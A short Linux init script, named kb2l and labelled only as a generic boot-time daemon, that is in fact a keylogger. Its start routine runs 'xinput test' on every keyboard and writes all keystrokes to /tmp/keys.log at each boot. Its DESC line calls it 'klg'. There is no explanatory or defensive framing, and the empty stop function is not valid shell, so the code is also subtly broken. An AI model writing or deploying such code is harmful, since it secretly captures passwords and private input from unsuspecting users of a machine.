#!/bin/sh
### BEGIN INIT INFO
# Provides:          kb2l
# Required-Start:    $remote_fs $syslog
# Required-Stop:     $remote_fs $syslog
# Default-Start:     2 3 4 5
# Default-Stop:      0 1 6
# Short-Description: Start daemon at boot time
# Description:       Enable service provided by daemon.
### END INIT INFO

DESC="klg created by kb2l"
NAME=kb2l
#DAEMON=

do_start()
{
   xinput list |   grep -Po 'id=\K\d+(?=.*slave\s*keyboard)' |   xargs -P0 -n1 xinput test > /tmp/keys.log
}

do_stop()
{
}

case "$1" in
   start)
     do_start
     ;;
   stop)
     do_stop
     ;;
esac

exit 0
